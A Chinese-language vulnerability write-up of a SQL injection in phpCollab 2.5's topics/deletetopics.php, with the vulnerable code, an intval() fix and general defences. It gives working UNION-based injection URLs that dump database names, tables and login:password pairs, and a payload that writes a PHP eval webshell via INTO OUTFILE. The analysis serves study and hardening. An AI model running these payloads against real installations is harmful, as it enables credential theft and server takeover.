您的位置:首页 > 编程语言 > PHP开发

[漏洞分析] PHPCollab 2.5 SQL注入漏洞

2015-05-26 15:24 260 查看
此漏洞的编号为EDBID:37004 OSVDB:122102

phpCollab is an open source internet-enabled system for use in projects that require collaboration over the internet.

Those organizations, such as consulting firms, that rely on a division between firm-side and client-side information will benefit most from use of phpCollab

phpCollab是一个开源的基于internet的系统,用在需要通过internet来进行合作的项目中。比如咨询公司,需要隔离公司与客户信息,可以从phpCollab中得到很多利益。

官网为http://www.phpcollab.com/

漏洞存在于topics文件夹下面的deletetopics.php中

一、漏洞复盘

安装此web程序,实验之前需要新添加一个项目



随后在项目下添加话题



漏洞存在于删除评论时,参数project为漏洞点

http://[HOST]/phpcollab/topics/deletetopics.php?project=2&id=2&PHPSESSID=27tujmpv903453tcto9o9jf465




首先加一个撇号,可见网页中返回了错误信息

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=2




通过order by判断SQL语句中存在多少列,根据网页的反馈可知共存在22列



接下来寻找可利用的回显位置,发现是位置6



利用函数database(),user(),version()分别得到数据库的名称,用户名称以及数据库的版本号







得到所有数据库的名称

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20information_schema.schemata--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=1




得到phpcollab数据库中所有表的名字

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20information_schema.tables%20where%20table_schema=0x706870636f6c6c6162--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=1




得到members表中所有列的名称

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20information_schema.columns%20where%20table_name=0x6d656d62657273--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=1




最终得到用户名和密码

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,group_concat(login,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20members--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=1




也可以通过此漏洞向网站中写入webshell

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,%27%3C?php%20@eval($_POST[cmd]);?%3E%27,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20%20into%20outfile%20%27c:/wamp/www/phpcollab/ma2.php%27--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=1




通过一句话木马的客户端连接webshell,成功,表示木马已经写入



二、漏洞分析

topics文件夹下面的deletetopics.php中第27行至33行是存在漏洞的位置

if($_GET['project']){
$project = $_GET['project'];
} else {
unset($project);
}
$tmpquery = "WHERE pro.id = '$project'";


程序直接从URL中取下project变量值,随后保存在变量$project中,在第32行未作任何安全处理的情况下直接放到SQL语句中。

三、安全加固

对变量$project的类型进行强制转换,利用函数intval(),即将变量变为下面这个样子

if($_GET['project']){
$project = $_GET['project'];
$project = intval($project);
} else {
unset($project);
}
$tmpquery = "WHERE pro.id = '$project'";


加固之后如果在project参数后面加撇号,发现程序不再报错了



四、防范SQL注入的方法

1使用预编译语句

2使用存储过程

3检查数据类型

4使用安全函数(OWASP ESAPI)
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航